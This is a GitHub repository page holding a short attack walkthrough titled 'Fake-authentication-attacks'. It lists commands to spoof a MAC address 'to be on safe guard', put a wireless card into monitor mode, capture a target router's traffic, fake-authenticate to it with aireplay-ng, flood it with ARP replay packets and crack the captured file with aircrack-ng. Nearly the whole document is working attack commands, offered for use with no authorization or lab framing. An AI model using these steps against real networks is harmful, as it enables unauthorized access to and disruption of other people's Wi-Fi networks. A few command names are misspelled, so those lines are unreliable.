-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathfake-auth
60 lines (54 loc) · 1.32 KB
/
fake-auth
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Fake-authentication-attacks
## Be on Safe Guard
#### change macaddress
## To view mac-address
```bash
macchnger -s wlan0
```
## To change mac-address
```bash
ifconfig wlan0 down
```
```bash
macchanger -r wlan0
```
```bash
ifconfig wlan0 up
```
## Now Ready to Attack
```bash
su root
```
```bash
airmon-ng check kill
```
```bash
airmon-ng start wlan0
```
```bash
airodump-ng wlan0
```
### stop and select network ```ctrl``` + ```c```
```bash
airodump-ng wlan0 --bssid <router mac> --channel <channel n.o >
```
# Now fake-auth to that selected router.
```bash
aireplay-ng --fakeauth 0 -a <router-mac> -c <kali mac> wlan0
```
### Again to check kali mac address (you can use any of them)
- ```macchanger -s wlan0```
- ```ipaddr```
- ```ifconfig```
# Sending data packet and overloading
```bash
aireplay-ng --arpreplay -b <router mac> -h <kali mac> wlan0
```
### It automaticaly save the file
- use ```aircrack-ng``` on it.
## Thank you
## Badges
Add badges from somewhere like: [shields.io](https://shields.io/)
[](https://choosealicense.com/licenses/mit/)
[](https://opensource.org/licenses/)
[](http://www.gnu.org/licenses/agpl-3.0)